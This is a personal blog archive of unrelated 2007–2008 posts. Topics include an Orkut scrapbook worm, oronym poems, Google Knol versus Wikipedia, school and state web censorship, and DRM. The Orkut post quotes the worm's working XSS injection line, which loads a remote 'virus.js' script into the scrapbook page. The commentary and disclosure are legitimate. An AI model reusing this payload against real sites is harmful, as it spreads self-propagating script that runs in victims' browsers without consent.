Orkut finally posted a notice about the worm. I certainly appreciate that they worked quickly on fixing the problem. However, I still believe there should have been an ongoing dialog with their users. When you put together a security response plan, you need to include not only an engineering team, but also P.R. resources to handle communicating with the outside world. "Trust" is the most important commodity a social network has. The panic you feel when you think your accounts, and perhaps computer, are infected, is not going to be erased by an after-the-fact message two days later. All social networks should have a plan in place that includes (at a minimum) telling people that a solution is being developed, and ideally includes periodic updates on the progress. Providing additional information about the problem as it becomes available would also be great, but the primary goal is to show that users' concerns are being taken seriously, and that people are actively working to fix the problem. Responsiveness, concern, and information, will help ensure that people maintain their trust in your service.
December 2007 Archives
I had to head off and get some sleep last night, so I didn't have time to try and track this down, but others did. I've attached the javascript code below for those who want to see it.
I have to say, I'm disappointed by Google's response time on this issue. I noticed the problem Tuesday evening around 10 or 11pm EST. As soon as I knew it was a worm I posted a support request to Orkut (which, btw, is not easy—they keep redirecting you to tips on protecting your computer). Once I had more details and posted my original link, I filed another report, this time through a security form (although the only way to do so was to claim that my account had been compromised). That was between midnight and 1am EST. This morning when I went to check around 7am EST, the worm was still spreading.
I would have hoped that they could have gotten the reports, paged the appropriate people, and then turned off scrapbooks, or disabled HTML scrapbooks, until things were under control. If that wasn't possible (and I understand that making on-the-fly code changes to a large distributed system is not always the simplest thing), then they should have shut Orkut down. And at the very least, I would expect to see an explanation and apology on Orkut.
The issue isn't whether or not the worm was dangerous. The issue is that I now don't trust Google to respond quickly the next time there's a worm. And the next one might not be so benign.
Ironically, this has caused a number of my friends (who like myself, haven't used Orkut in quite a while) to update their profiles. It may even increase Orkut's overall traffic in the States, since they've largely been forgotten here.
The original source file is no longer in place, so the worm has hopefully stopped. Since Google has posted nothing about it on the Orkut site or blog, I have no idea whether the underlying flaw has been fixed.
Looking at the code, my guess is that the hole is here:
"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";
There is a "script" attribute provided to the embed of a Flash video. Letting the script element through allowed for arbitrary javascript execution in the context of the scrapbook page. Definitely not a good thing. It would certainly be possible for such a script to do quite a bit of damage. I'm sure there are more detailed examinations of the problem on the net. Searching around it's clear that this is probably the third variation of the exploit that has been used in recent days.
Javascript code can be found below the fold.
A photochrom of Mulberry Street in theborough of Manhattan, New York City, from the year 1900. Mulberry Street is the center of New York's Little Italy and continues into Chinatown.
I haven't been able to find a copy of the source yet, but the method of transmittal looks pretty straightforward.
You get an email notification (or find out on Orkut) that you have a new scrapbook entry. It's from a friend. It says.
2008 vem ai... que ele comece mto bem para vc
There's no need to click on anything, just viewing it does the trick. The scrap deletes itself, and adds you to the Orkut Community "Infectados pelo Vírus do Orkut". That group, as I write this, is gaining members at a rate of at least one hundred per minute.
A quick (Google :-) translation of the description of the group produces the following:
CALMA!
If you came into this community, make sure that no data was stolen and not your will, that is not my goal.
If I are sure at the end of all, this community should is lotada of people.
This just to show how orkut may be dangerous, you came up here without clicking absolutely no link malicious, everything was done reading scraps.
Orkut allows friend-to-friend scraps to contain HTML. Presumably there's a bug somewhere in the HTML filter which is allowing malicious Javascript to get through.
It does not appear at first glance that the worm does anything more dangerous than pass itself on to one or more of your friends. I think it unlikely that it would be able to steal your password, although it could potentially access other private information.
[Update. According to a posting on the Community site by the author of the virus, it can be blocked by blocking Flash.]
Well, many people do not like to join the community, is a right that you have, although it is only a joke.
But, just as I am doing it, someone else can do to try to hurt someone.
As some people asked, I will teach how to protect here.
Firefox (easier):
- Install the extension Flashblock
[Https: / / addons.mozilla.org/en-US/firefox/addon/433]
- Restart Firefox and ready
If you do not have Firefox, download here:
Http://www.mozilla.com/en-US/firefox/
Internet Explorer:
- Go to the Tools Menu-> Internet Options
- Click on the Security tab
- In Zone of web content let selected Internet
- Click Custom Level ...
- Find the part where is Plugi-ins and ActiveX controls of the
- Disable the option Run controls and plugi-ins of ActiveX
With that you will no longer see for example the videos from YouTube, both in and outside Orkut, but at least you will be safe.
I suggest you download Firefox because it is easier to enable and disable.
All I really wanted to do was find the most recent email address of a friend. It was a mere matter of checking for the most recent email message from him, but he has one of those random .signature generators, and it had this interesting little poem. An hour (at least) later, here we are.
My Spill Chequer
Eye halve a spelling chequer
It came with my pea sea
It plainly marques four my revue
Miss steaks eye kin knot sea.
Eye strike a key and type a word
And weight four it two say
Weather eye am wrong oar write
It shows me strait a weigh.
As soon as a mist ache is maid
It nose bee fore two long
And eye can put the error rite
Its rarely ever wrong.
Eye have run this poem threw it
I am shore your pleased two no
Its letter perfect in it's weigh
My chequer tolled me sew.
(Sauce unknown)
So I started searching to see who wrote it. I didn't find that, but I did come across a lovely word; "oronym". It isn't in my online dictionary (it's a relatively recent neologism (another lovely word), but the Wikipedia (of course) has it. It says:
This term was coined by Gyles Brandreth and first published in his book The Joy of Lex (1980), and it was used in the BBC programme Never Mind the Full Stops, which also featured Brandreth as a guest.
Oronyms are basically homophones which span words. They work in spoken English (and often depend on dialects) because we run all our words together. The above poem uses them of course, but there's a more famous example. (This version taken from Fun With Words.) I've heard this one before, although I'd forgotten it. Once upon a time :-) I had a friend who could recite the entire piece.
An Oronym Story – Ladle Rat Rotten Hut
Even more impressive in length is the following oronym story. It is the tale of Little Red Riding Hood... but not the famous version; this one is constructed entirely from homophones: Ladle Rat Rotten Hut. This curious version was written in 1940 by a professor of French named H. L. Chace. He wanted to show his students that intonation is an integral part of the meaning of language. Try reading it out loud (best in the accent of Southern/Central USA)!
Wants pawn term, dare worsted ladle gull hoe lift wetter murder inner ladle cordage, honor itch offer lodge, dock, florist. Disk ladle gull orphan worry putty ladle rat cluck wetter ladle rat hut, an fur disk raisin pimple colder Ladle Rat Rotten Hut.
Wan moaning, Ladle Rat Rotten Hut's murder colder inset. "Ladle Rat Rotten Hut, heresy ladle basking winsome burden barter an shirker cockles. Tick disk ladle basking tutor cordage offer groinmurder hoe lifts honor udder site offer florist. Shaker lake! Dun stopper laundry wrote! Dun stopper peck floors! Dun daily-doily inner florist, an yonder nor sorghum-stenches, dun stopper torque wet strainers!"
"Hoe-cake, murder," resplendent Ladle Rat Rotten Hut, an tickle ladle basking an stuttered oft. Honor wrote tutor cordage offer groin-murder, Ladle Rat Rotten Hut mitten anomalous woof. "Wail, wail, wail!" set disk wicket woof, "Evanescent Ladle Rat Rotten Hut! Wares are putty ladle gull goring wizard ladle basking?"
"Armor goring tumor groin-murder's," reprisal ladle gull. "Grammar's seeking bet. Armor ticking arson burden barter an shirker cockles."
"O hoe! Heifer gnats woke," setter wicket woof, butter taught tomb shelf, "Oil tickle shirt court tutor cordage offer groin-murder. Oil ketchup wetter letter, an den - O bore!"
Soda wicket woof tucker shirt court, an whinney retched a cordage offer groin-murder, picked inner windrow, an sore debtor pore oil worming worse lion inner bet. En inner flesh, disk abdominal woof lipped honor bet, paunched honor pore oil worming, an garbled erupt. Den disk ratchet ammonol pot honor groin-murder's nut cup an gnat-gun, any curdled ope inner bet.
Inner ladle wile, Ladle Rat Rotten Hut a raft attar cordage, an ranker dough ball. "Comb ink, sweat hard," setter wicket woof, disgracing is verse. Ladle Rat Rotten Hut entity betrum an stud buyer groin-murder's bet.
"O Grammar!" crater ladle gull historically, "Water bag icer gut! A nervous sausage bag ice!"
"Battered lucky chew whiff, sweat hard," setter bloat-Thursday woof, wetter wicket small honors phase.
"O Grammar, water bag noise! A nervous sore suture anomolous prognosis!"
"Battered small your whiff, doling," whiskered dole woof, ants mouse worse waddling.
"O Grammar, water bag mouser gut! A nervous sore suture bag mouse!"
Daze worry on-forger-nut ladle gull's lest warts. Oil offer sodden, caking offer carvers an sprinkling otter bet, disk hoard hoarded woof lipped own pore Ladle Rat Rotten Hut an garbled erupt.
Mural: Yonder nor sorghum stenches shut ladle gulls stopper torque wet strainers.
The same Fun With Words page also then references "mondegreens" (another new word!), which are misheard lyrics.
The term mondegreen was originally coined by author Sylvia Wright, and has come to be quite widely used. As a child, Wright heard the lyrics of The Bonny Earl of Murray(a Scottish ballad) as:
Ye highlands and ye lowlands
Oh where hae you been?
Thou hae slay the Earl of Murray
And Lady MondegreenIt eventually transpired that Lady Mondegreen existed only in the mind of Sylvia Wright, for the actual lyrics said that they "slay the Earl of Murray and laid him on the green." And to this day Lady Mondegreen's name has been used to describe all mishearings of this type!
You see these a lot on the web, when people are writing down the lyrics to their favorite songs. I remember stumbling across this one. The song is Natasha Bedingfield's "These Words". The verse goes:
Read some Byron, Shelley and Keats,
recited it over a hip-hop beat
I'm havin trouble sayin what i mean,
with dead poets and a drum machine
But the first version I found online (on some poor girl's journal) was:
Written by Ricelli and Keys
Resided in over a heartbeat
I'm having trouble saying what I mean
With dead poets and drum machines
And now I think I better get back to sending my friend that email message!
It's early morning and the buzz on Google's Knol is already building fast. I'm not going to rehash what other's are saying, you can go read them for yourself.
Google calls a "knol" a unit of knowledge (this from the people who misspelled "googol"). Google says the goal is to "find a way to help people share their knowledge", and Google Knol is the place where they can do that; as authors, contributors and commenters. Everyone has jumped on this and said it's a Wikipedia competitor, and maybe in the long run that is true, but that ignores an important distinction; Knol is focused on highlighting authors. Google calls this the "key idea", and I think they are absolutely right.
Wikipedia leverages the wisdom of the crowd to build collaborative articles. It relies on multiple authors, many eyes, consensus and majority rule to get accuracy. In a lot of cases that works well. However, it suffers from all the usual problems of a democratic system. Backroom deals can skew the results. Controversial subjects can require special protection, which gives more control to the editors. And majority rule can stifle new ideas or legitimate criticism. Again, those in control of the overall system can exercise a great deal of power that isn't especially visible to the outside world. And of course, sometimes the things which "everybody knows" aren't always correct.
If Wikipedia is a communist democracy (and I mean that in a completely positive sense, you can't truly have the former without the latter), then Google Knol is a meritocracy. The key is something that has been talked about in social networking circles for several years. Knol depends on reputation. The author of the article is prominent. You see everything else they have written. You see what their peers think of them (and who their peers are). You see what commenters have said about them. Knol is blogging with a focus, and attempt to move beyond general topic pundits and bring in the specialists. The author of the article is a known identity which can be tied to other articles in the past and future. (Note that I don't say "person". It could be a group, and of course we don't necessarily have to know the physical identity. The key behind combining reputation and anonymity is the concept of a long term identity. In the ideal system, nobody knows that you're a dog, but they know that you're the same dog.) Knol attempts to ensure accuracy by assuming that a persistent identity (e.g. your Google account) will encourage you to try and maintain a good reputation. Your reputation in turn depends on how much support you can garner from your peers, contributors and commenters.
The usual problems with online reputation systems apply here of course. Online identities can be discarded when they become tarnished. In some cases that's a feature—there are certainly aspects of my past I'd love to discard that easily—but if identities are easy to come by it weakens the power of reputation. That is countered however, by the fact that it takes time to build a reputation, and discarded articles don't drive traffic. More worrisome is the degree to which people can jazz the system by creating multiple identities that work together to build a buzz and the appearance of consensus. But then, Wikipedia has the same weakness. Even real world systems are susceptible to fake groundswells.
In general, I think the idea has a lot of merit, and it's likely to result in a lot of in-depth and well organized articles (the current Knol screen shot shows a very professional looking page—much nicer than your typical wiki). The big question is whether it will gain the breadth that Wikipedia has, and how it will evolve over time? Who maintains articles when the author loses interest (or dies)? People can make contributions and comments, but they aren't directly editing (or will it allow edits, but with publication under control of the author?). I keep coming back to the first Wikipedia edit my daughter made. She was writing an article on the Oregon Trial (a mock tourism brochure, actually) and in the course of her research she discovered the Wikipedia had the length of the trail wrong—so she fixed it. How easy (and immediate) would that process be using Knol? And what happens when over time there are thirty different articles on the same subject? Have we just recreated the web? (Well, at least we know it won't do away with the need for Google's search engine :-).
Like most Google projects, Knol is starting out on an invitation basis, although in this case I suspect invitations will be a bit harder to get than usual. The initial focus will probably be more on quality than quantity. I think the idea of a reputation-based system, and the appeal of an author-centric system, will make it successful, but I don't see it replacing the Wikipedia. If anything, I think merging the two concepts would make more sense. Combining both authored and crowd-sourced systems into a single repository. It seems unlikely that Wikipedia would do anything so drastically different, and starting a "new" Wikipedia would be hard for anyone to do, so unfortunately it's not likely to happen. I guess we'll all have to get used to searching two locations and sending our edits to two different sites.
Yesterday my daughter Shireen asked me again to help her get around the filters at school. She can get to her email, but she can't get to DeviantArt, where she posts photos and artwork. Nor can she use her IM client, and she'd wanted to ask me a question while she was at school. I pointed her at a web IM client that would probably work, and promised to set up an encrypted proxy server on our web site so she could browse wherever she wanted. I also pointed out that her problem is in miniature the same problem faced by millions of folks in Iran, China and other countries that try to restrict the flow of information to and from the internet.
While I can sympathize (in theory) with people who see the internet as a corrupting influence, I do not sympathize with the view of "the State as parent", and furthermore, I believe the correct solution to corrupting influences (whether you are a parent or a country) is education and knowledge—not hiding them under a rock and pretending they don't exist. If your meme can't win the battle of information, then it doesn't deserve to survive. (I suppose it's not terribly surprising that such a darwinist approach to ideas doesn't go over well with theocracies. :-) And of course in the case of Iran and China, two of the biggest censorship offenders (how nice to know that Iran is using American software to do the job), the censorship has far more to do with maintaining power than any particular ideology.
In any case, while looking for something completely different this morning, I came across the following Firefox web browser extension.
I actually hadn't realized that Iran blocked Flickr, there's an active Iranian community there.
I suppose I shouldn't be surprised. But it's a pity, Flickr's a great way to see what Iran really looks like right now.
Interesting. In summary, this study shows that Alzheimer's isn't in itself a reason for decreased mental functions. Some people who remained mentally active by doing lots of things requiring mental skills, had normal cognitive skills even though autopsies showed that they had Alzheimer's.
Of course, just to put a mild damper on it, I'll point out that we don't *know* that the mental activity actually prevented harm. For all we know there's some other genetic difference which makes it possible for some people to work around the damage. But in the meantime. Keep mental exercising! (Mentaling?).
When I first introduced my daughter to Wikipedia, she was in middle school. She used it as one of her sources for a project on the Oregon Trail. But she went a step further. She set up a Wikipedia account and corrected an error in the entry. Every since then she makes it a regular part of her research. Using it as one of many sources, and updating it when she's done. What better lesson to our kids (and what better motivator), than learning that knowledge isn't just for school, it's for sharing and teaching as well?
Updated: Feb 27, 2008 to add:
FWIW. Here's my daughter's Oregon Trail "Brochure". 4MB PDF.
There are a few precautions you must take to travel
the Oregon Trail. But when you get to your lovely
destination, the river crossings, exhaustion,
accidents, bad weather, cholera, indian
attacks, starvation, stampedes, rattle
snakes, dysentery, scorpions, bandits
and broken-down wagons will all be
behind you.
Admittedly, CNet has a tech focus, but it bothers me that they aren't even mentioning the biggest error that contributed to James Kim's death.
The real tragedy (and it's repeated over and over again), is that there are two basic rules you should always follow when you are lost and hoping for rescue. Maybe you had to be a Boy Scout to get these, but they ought to be part of everyone's education.
- Stay together.
- Stay in one place.
When James Kim went for help (and off the road, at that), he violated both of those rules. Any article about his death should emphasize those rules, because they are far more likely to save lives than a stray cell phone signal.
This is absolutely insane.
That's right. If you purchase this disk, it will refuse to share media files with other users because they haven't been "licensed". There's a lot of talk about how organizations like RIAA are hurting consumers, but there's group here that has been hurt even more. I challenge you to get together with a bunch of your friends and find any commercial building which will allow you to just hang out and play music together in public. And should you actually record that music and put it on the web--watch idiot companies like this block your ability to share it. RIAA wants all music to be commercial. As far as they are concerned, the amateur musician died the day piano rolls were introduced.
